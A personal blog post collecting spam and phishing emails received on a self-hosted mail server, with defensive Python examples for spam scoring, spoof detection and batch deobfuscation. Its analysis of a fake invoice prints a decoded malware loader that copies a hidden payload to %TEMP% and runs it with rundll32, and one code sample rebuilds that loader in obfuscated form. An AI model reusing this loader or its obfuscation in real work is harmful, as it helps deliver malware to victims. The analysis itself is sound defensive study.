I have been running a mail server for this site for the past year or so, and through the magic of SPAM and SPAM filters, I have acquired an ever growing collection of SPAM messages, phishing attempts and different attempts at getting my money one way or another.

Note: This post is getting regular updates as I get more and more SPAM.

Regular SPAM

Barely worth any mention, but it is there. Your run-of-the-mill SEO proposals, links to dubious-quality stuff on AliExpress, etc… These are boring but they exist, so with that out of the way, let’s start with the funnier ones that landed in my server’s SPAM folder.

Classic “Nigerian Prince” scam

I was very surprised both by these emails existing in 2022 and by them being pretty much exactly the same as they have been since I have memory of the Internet. The “Nigerian Prince” scam, or “Advance fee fraud”, promises a large amount of money in return for you, the mark, paying the “fees” needed to unlock that money.

A typical example from my mailbox, redacted for brevity and scammers’ privacy:

Dear Sir

Sir, greetings to you and your family, I hope you all are in good health ? It is my pleasure to read your response and I thank you very much for your reply. May God bless you..

I am Miss Sonia Peter Fofo, the only daughter of PETER FOFO who died in a motor accident some months ago. He was a contractor to the federal government of Cote d’Ivoire. Before he gave up in the hospital he told my mother and I that he deposited a sum of US $ 3.5 million with a bank in Lome-Togo and where the documents are.

Now we are looking for someone who will assist us and claim the (money) so that when it arrives in his home/ country he will take his own share and send it to us our own. I am writing this mail to see if you can assist us.

Upon receipt of your acknowledgment mail I shall send you the contact of the bank director. Please contact me back on my private email : [scammer]@aol.com

Thanks

Miss Sonia Peter Fofo

Pretty standard stuff. Bad grammar, generic platitudes, large sums of money from someone using free email, some generic sob story, a reply address different from the one the email was sent from, etc…

SpamAssassin’s analysis results were also pretty funny, especially knowing that certain phrases like “Dear [whatever]” will immediately raise the SPAM score of a message.

Rule                  Description
DEAR_SOMETHING        BODY: Contains ‘Dear (something)’
LOTS_OF_MONEY         Huge… sums of money
MONEY_FREEMAIL_REPTO  Lots of money from someone using free email?
MONEY_FRAUD_8         Lots of money and very many fraud phrases
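To show how the rules in that table actually fire, here is an added example (not from the original post, and not SpamAssassin’s real rule code) that re-implements three of them as plain regular expressions and header checks: “Dear (something)”, a huge sum of money, and a Reply-To at a free-mail provider that differs from the From address. The two sample messages, the free-mail domain list and the per-rule scores are my own constructed approximations, not SpamAssassin’s scores.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample in the style of the advance-fee message quoted above.
# Addresses are invented placeholders, not the original scammer's.
SAMPLE_SCAM = """\
From: "Sonia Peter Fofo" <sonia@example.net>
Reply-To: sonia.fofo@aol.com
To: root@example.org
Subject: Assistance needed

Dear Sir

I am the only daughter of a contractor who deposited a sum of
US $ 3.5 million with a bank. Please contact me back on my private
email so we can claim the money.
"""

# Constructed benign message for comparison.
SAMPLE_HAM = """\
From: "Alice" <alice@example.com>
To: root@example.org
Subject: Lunch

Hi, are we still on for lunch on Friday? The bill was 12 dollars last time.
"""

# Assumed list of free-mail providers and assumed per-rule scores.
FREEMAIL_DOMAINS = {"aol.com", "gmail.com", "hotmail.com", "outlook.com", "yahoo.com"}
RULES = {"DEAR_SOMETHING": 1.0, "LOTS_OF_MONEY": 0.5, "MONEY_FREEMAIL_REPTO": 2.0}

# "Dear Sir", "Dear Customer", ... at the start of a body line.
_DEAR_RE = re.compile(r"^\s*Dear\s+\w+", re.IGNORECASE | re.MULTILINE)
# A currency marker followed by a figure in the millions or billions.
_MONEY_RE = re.compile(
    r"(?:US\s*\$|USD|\$|€)\s*\d[\d,.]*\s*(?:million|billion)", re.IGNORECASE
)


def body_text(msg):
    """Return the text/plain content of a parsed message as a string."""
    if msg.is_multipart():
        parts = [p.get_payload(decode=True).decode(errors="replace")
                 for p in msg.walk() if p.get_content_type() == "text/plain"]
        return "\n".join(parts)
    return msg.get_payload(decode=True).decode(errors="replace")


def matched_rules(raw):
    """Return the set of rule names that fire on a raw RFC 5322 message."""
    msg = message_from_string(raw)
    text = body_text(msg)
    hits = set()
    if _DEAR_RE.search(text):
        hits.add("DEAR_SOMETHING")
    if _MONEY_RE.search(text):
        hits.add("LOTS_OF_MONEY")
    # MONEY_FREEMAIL_REPTO: big money plus a Reply-To at a free-mail provider
    # that differs from the sending address (the "reply elsewhere" pattern).
    _, from_addr = parseaddr(msg.get("From", ""))
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    if "LOTS_OF_MONEY" in hits and reply_to and reply_to.lower() != from_addr.lower():
        if reply_to.rsplit("@", 1)[-1].lower() in FREEMAIL_DOMAINS:
            hits.add("MONEY_FREEMAIL_REPTO")
    return hits


def score(raw):
    """Sum the assumed scores of every rule that fired."""
    return sum(RULES[name] for name in matched_rules(raw))


if __name__ == "__main__":
    for label, sample in (("scam", SAMPLE_SCAM), ("ham", SAMPLE_HAM)):
        print(label, sorted(matched_rules(sample)), score(sample))
```

The Reply-To rule is the interesting one for a defender: on its own a free-mail reply address is normal, but combined with a “large sum of money” body it is a strong signal, which is why real filters stack small scores rather than blocking on a single match.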

This is the server admin!

I have received a few of these, and some can punch through SpamAssassin and land in my inbox. These messages look like a mailer error or some server warning that requires the user’s attention. Most of them claim to be from the mail server administrator (hello, me!) and require clicking a link to check what the issue is.

These tend to look kind of professional and the HTML formatting is decent. A text-only example of one of these messages:

Message generated from heavydeck.net server.

Notification Dear root,

Your account associated with your root@heavydeck.net has been limited Reason: Messages - Delivery Process Failed .

What happens when new messages are inaccessible?

Once a new message is limited, it will be inaccessible—users will not be able to receive new messages.

Want to keep the account and receive new messages? [Link to scammers website]

heavydeck.net email support

Funny, I don’t remember sending myself an email regarding an issue I myself should already be aware of… 🤔
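A message claiming to come from your own domain should carry an aligned SPF or DKIM pass recorded by your own MTA; if it does not, it is someone else writing in your name. The following is an added example (mine, not the author’s setup) that parses the Authentication-Results header and flags exactly that case. heavydeck.net is the domain from the quoted message; the authserv-id mx.heavydeck.net and both header values are constructed assumptions.

```python
import re
from email import message_from_string
from email.utils import parseaddr

OWN_DOMAIN = "heavydeck.net"        # the domain being impersonated in the quoted message
AUTHSERV_ID = "mx.heavydeck.net"    # assumed identifier our own MTA writes into the header

# Constructed sample: claims to be our own support address, but the receiving
# MTA recorded no DKIM signature and an SPF failure (invented values).
SPOOFED = """\
Authentication-Results: mx.heavydeck.net;
  dkim=none; spf=fail smtp.mailfrom=mailer.example.invalid;
  dmarc=fail header.from=heavydeck.net
From: "heavydeck.net email support" <postmaster@heavydeck.net>
To: root@heavydeck.net
Subject: Your account has been limited

Your account has been limited. Want to keep the account? [link]
"""

# Constructed sample: genuine local mail with aligned DKIM and SPF passes.
GENUINE = """\
Authentication-Results: mx.heavydeck.net;
  dkim=pass header.d=heavydeck.net; spf=pass smtp.mailfrom=heavydeck.net
From: root@heavydeck.net
To: root@heavydeck.net
Subject: cron output

Job finished.
"""


def parse_auth_results(value):
    """Split an Authentication-Results value into (authserv-id, {method: (result, props)})."""
    value = re.sub(r"\s+", " ", value).strip()      # unfold continuation lines
    parts = [p.strip() for p in value.split(";")]
    results = {}
    for part in parts[1:]:                           # parts[0] is the authserv-id
        if not part:
            continue
        tokens = part.split()
        method, _, result = tokens[0].partition("=")
        props = {}
        for tok in tokens[1:]:
            key, _, val = tok.partition("=")
            props[key.lower()] = val.lower()
        results[method.lower()] = (result.lower(), props)
    return parts[0].lower(), results


def _aligned(domain, own):
    """DMARC-style relaxed alignment: same domain or a subdomain of it."""
    domain = domain.lower()
    return domain == own or domain.endswith("." + own)


def self_impersonation(raw, own_domain=OWN_DOMAIN, authserv_id=AUTHSERV_ID):
    """True when From: claims our domain but no aligned SPF/DKIM pass from our MTA backs it."""
    msg = message_from_string(raw)
    _, from_addr = parseaddr(msg.get("From", ""))
    from_domain = from_addr.rsplit("@", 1)[-1].lower()
    if from_domain != own_domain:
        return False                                 # not claiming to be us
    server, auth = parse_auth_results(msg.get("Authentication-Results", ""))
    if server != authserv_id:
        return True  # no record from our own MTA: a sender can forge this header
    dkim_res, dkim_props = auth.get("dkim", ("none", {}))
    spf_res, spf_props = auth.get("spf", ("none", {}))
    dkim_ok = dkim_res == "pass" and _aligned(dkim_props.get("header.d", ""), own_domain)
    spf_ok = spf_res == "pass" and _aligned(spf_props.get("smtp.mailfrom", ""), own_domain)
    return not (dkim_ok or spf_ok)


if __name__ == "__main__":
    print("spoofed:", self_impersonation(SPOOFED))
    print("genuine:", self_impersonation(GENUINE))
```

The authserv-id check matters: Authentication-Results is just a header, so only the copy your own MTA adds (and which it should strip from incoming mail) is trustworthy. Publishing a DMARC policy with p=reject for the domain is the way to make other receivers apply the same logic.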

Notice from a service you didn’t use

This one was pretty funny. I received a notice from a service informing me that they are shutting down, but that I can get all of their database before they do. For a nominal fee, of course.

Hello,

My name is [whatever]

I regret to inform you that [scam.org] will shut down Friday.

We have now made all our databases available to the public on our website at a one-time fee. Visit us at [scam.org]

Among other things, this SPAM email was received as plain text, with no embedded links or referral URLs, just a URL written in the message as-is.

Additionally, the domain was registered ~6 months ago (at the time of writing) and will expire in 6 months. In that time this completely legit company has managed to start, launch, and prepare to shut down. In 6 months.

Very very pessimistic entrepreneurs.

Please open the “invoice” attached

Another classic. An email from an alleged rental car company (in this case) sends me an invoice attached to the email. Grammar was bad and the email formatting was subpar, with just “Re:” as the subject.

Unlike any other rental car service, where invoices come as a PDF document, this “company’s” invoice comes as a password-protected ZIP, containing an ISO file, which in turn contains a Windows shortcut (.lnk) file.

Hello, Let me share the papers we talked regarding a few days ago. Let me know if you have any queries relating to the attachments.

Personal password: doc1234

We look forward to hearing from you soon.

Kind regards,

Attached car papers to this link

Analysis of the “invoice”

The ISO file apparently contains a single .lnk file. However, the shortcut points to ladpsikeyfad/expressimaging.bat, which is not visible to the user since it sits in the directory ladpsikeyfad, hidden by the UDF filesystem on the ISO. Windows can still access it if you know the full path, which of course the attacker does.

Now, what does expressimaging.bat do? Well, it is a batch file scrambled using %variables%, but after decoding it the command line is:

@echo off
xcopy /s /i /e /h ladpsikeyfad\rewarding.dat %TEMP%\*
rundll32 %TEMP%\rewarding.dat,#1

In essence: copy this rewarding.dat file to %TEMP% and execute it with rundll32 (calling its export with ordinal #1). Time to spin up a virtual machine and check what this car rental company had for me. (Me from the past: “My bet is on a cryptolocker”)
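The “scrambled using %variables%” trick is worth a closer look, because it is cheap to undo statically without ever running the file. As an added example (mine, not the post’s own analysis script), here is a small resolver that records every set name=value line in a batch script and expands %name% and %name:~start,len% substring references in the remaining lines, leaving real environment variables such as %TEMP% untouched. The obfuscated input below is constructed to decode to the same two commands shown above; its variable names are invented and it is not the actual file from the ISO.

```python
import re

# Constructed sample modelled on the set-and-substring obfuscation style.
# Not the real expressimaging.bat; variable names are invented.
OBFUSCATED = r"""@echo off
set "qv=rundll32 xcopy"
set "hz=ladpsikeyfad\rewarding.dat"
set "kk=/s /i /e /h"
%qv:~9,5% %kk% %hz% %TEMP%\*
%qv:~0,8% %TEMP%\%hz:~13%,#1
"""

# set name=value   or   set "name=value"
_SET_RE = re.compile(r'^\s*set\s+"?(?P<name>[^=\s"]+)=(?P<value>.*?)"?\s*$', re.IGNORECASE)
# %name%, %name:~start% and %name:~start,len% (cmd.exe substring syntax)
_VAR_RE = re.compile(r"%(?P<name>[A-Za-z0-9_]+)(?::~(?P<start>-?\d+)(?:,(?P<len>-?\d+))?)?%")


def batch_substr(value, start, length=None):
    """Apply cmd.exe %var:~start,len% semantics, including negative offsets."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)            # negative start counts from the end
    if length is None:
        end = n
    elif length < 0:
        end = n + length                     # negative length drops chars from the end
    else:
        end = start + length
    return value[start:end]


def expand(line, variables):
    """Expand references to script-defined variables; keep unknown ones verbatim."""
    def repl(m):
        name = m.group("name").lower()
        if name not in variables:
            return m.group(0)                # runtime env var such as %TEMP%: keep as-is
        value = variables[name]
        if m.group("start") is None:
            return value
        length = int(m.group("len")) if m.group("len") is not None else None
        return batch_substr(value, int(m.group("start")), length)
    return _VAR_RE.sub(repl, line)


def deobfuscate(script):
    """Return the script with set-lines consumed and all references expanded."""
    variables = {}
    output = []
    for line in script.splitlines():
        m = _SET_RE.match(line)
        if m:
            # cmd.exe expands %refs% inside a set value immediately, so do the same
            variables[m.group("name").lower()] = expand(m.group("value"), variables)
            continue                          # definitions are scaffolding; drop them
        output.append(expand(line, variables))
    return "\n".join(output)


if __name__ == "__main__":
    print(deobfuscate(OBFUSCATED))
```

This handles the immediate-expansion form only; scripts that enable delayed expansion (!var!) or build commands through call and for loops need a few more cases, but the approach is the same: resolve the strings, never execute them.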

Opening the “invoice”

Meanwhile, Me from a few hours later…
Whatever the executable is, it doesn’t seem to do a thing on a VM without internet connection. It just sits there, running, using barely 1M of RAM…

A few hours later…
Let’s give it internet… Because I’m curious about it… Nothing. The C&C must be down…

New login attempt!

This one surprised me. I received a “new login” notification for my own server, which does not have any service you can log in to. This login is apparently suspicious (you don’t say) and your account may be suspended if no action is taken.

[Screenshot: Bad login]

That shiny blue button links to an IPFS gateway, which will probably give me a very, very legit site. Let’s check it out, removing the trailing tracking info that points to my email.

[Screenshot: Sus login]

Secured by Norton. I already feel safe! Although I don’t remember having a webmail service on this server at all.

Scammer cannot fill in the blanks

Edit: Bonus content! Scammers cannot fill in the data of the scam-as-a-service package they bought!

This one is just like the previous one: suspicious login on your stock trading account and blah blah blah. However, this one caught my eye because the wannabe scammer clearly used a “fill in the blanks” template for it…

[Screenshot: Cannot fill in the blanks]

… And then forgot to actually fill in the blanks. Money well spent.

Renewal notice from a service I do use

This one I almost fell for. A scammer sent me a “renewal” notice impersonating a service I do use, NetCup, telling me my domain is about to expire. All the contents of the message were correct except for one thing: I do not use NetCup as my registrar. They seem to be aware of the issue, but just take a look anyway:

[Screenshot: sus]

Kudos for the scammer for:

  • Getting the hosting service correctly
  • Sending the message in the correct language (German)
  • Getting the domain name expiration date correctly
  • Making a decent look-alike email

Edit: Some native German speakers confirmed the language is “kinda broken”, but for someone learning German it looked the part well enough.

Would you be interested in this other domain?

This one is new. I am not, nor have I ever been, interested in owning the dot com version of this same domain, since this is, after all, just my personal site, which started as a joke about a game I haven’t played in close to a decade.

However, over the last few days I have received no less than one email a day asking if I was interested in purchasing the dot com version of the domain. With each new email the tone seems to subtly change.

Edit: This email spamming has gotten so bad I made a dedicated post.

We send SPAM for you

Another SPAM message, offering SPAM services, which was caught by my SPAM filter (not a good look).

Advertise up to 200 MILLION EMAILS WITH THE LOWEST PRICE! Immediate BOOM OF SALES!

[…]
( ) US$ 150 - Advertise to 1 MILLION EMAILS
( ) US$ 200 - Advertise to 5 MILLION EMAILS
( ) US$ 300 - Advertise to 25 MILLION EMAILS
( ) US$ 500 - Advertise to 50 MILLION EMAILS
( ) US$ 750 - Advertise to 100 MILLION EMAILS
( ) US$ 1000 - Advertise to 200 MILLION EMAILS

According to the info provided, this internet company from Brazil has been doing SPAM as a service since 1998.

Saudi group with a loan for me

I didn’t expect a personal blog with zero commercial projects to attract Saudi “dumb money” like that…

Assalamu Alaikum,

I am Faisal Al Rasheed by name, we are a group of loan funding investors based here in Saudi Arabia, would you need a loan for financing your project? If you have a project that needs a loan then let’s know the amount required to finance the project and tenure of the loan you would need to finance the project and I will reach out to other investors in our funding group and get back to you as soon as possible.

Shukra’n Faisal

Interesting that Saudi money uses both Outlook and Gmail accounts.

A domain name you can trust

Who wouldn’t trust a link to a domain that looks like this?

x1.dfkjghskjhrtuie.org.ru

My cat can suggest another one:

lkllkjasdflkasdwiuhrmnfg.com

(Subject name here)

An otherwise unremarkable SPAM email trying to sell me some “game console”, but the trailing line got me. Emphasis mine.

If this sounds like something that will make your life a whole lot better, let’s chat for 15 minutes this week. How does your calendar look this [day of week]?

Please, if you are paying for a SPAM campaign, at least fill in the blanks!!

A fake parking ticket

This one, a fake parking ticket, I almost fell for, for a number of reasons:

  • It landed on my Gmail inbox, not on SPAM
  • I did park my car at a questionable place in the past
  • The email looked kinda legit and had no typos

The message, loosely translated, looked like this:

Pending Payment for Parking Fine Dear Customer

We inform you that we have not received your payment of €140 for unauthorized parking. To avoid additional charges and possible legal action, please make the payment within a period of no more than 24 hours.

(Link to payment)

Thank you for your prompt attention to this matter.

Sincerely, (government agency)

This message is generated automatically. Please do not reply to this email.

Some red flags made me raise an eyebrow:

  • “Dear customer” (I’m fairly sure the government knows my name, and I am NOT a customer)
  • “24h” and “legal action” (If they wanted to get paid, I would receive a physical letter with a payment form, as with back taxes)
  • And not a single official looking logo on the email

The link would have taken me to a URL shortener service, which I did not click before manually sending the message to the SPAM folder, but for Science, let’s see if the phishing site even looks legit:

[Screenshot: Not active anymore]
It seems the same link got posted in too many SPAM messages…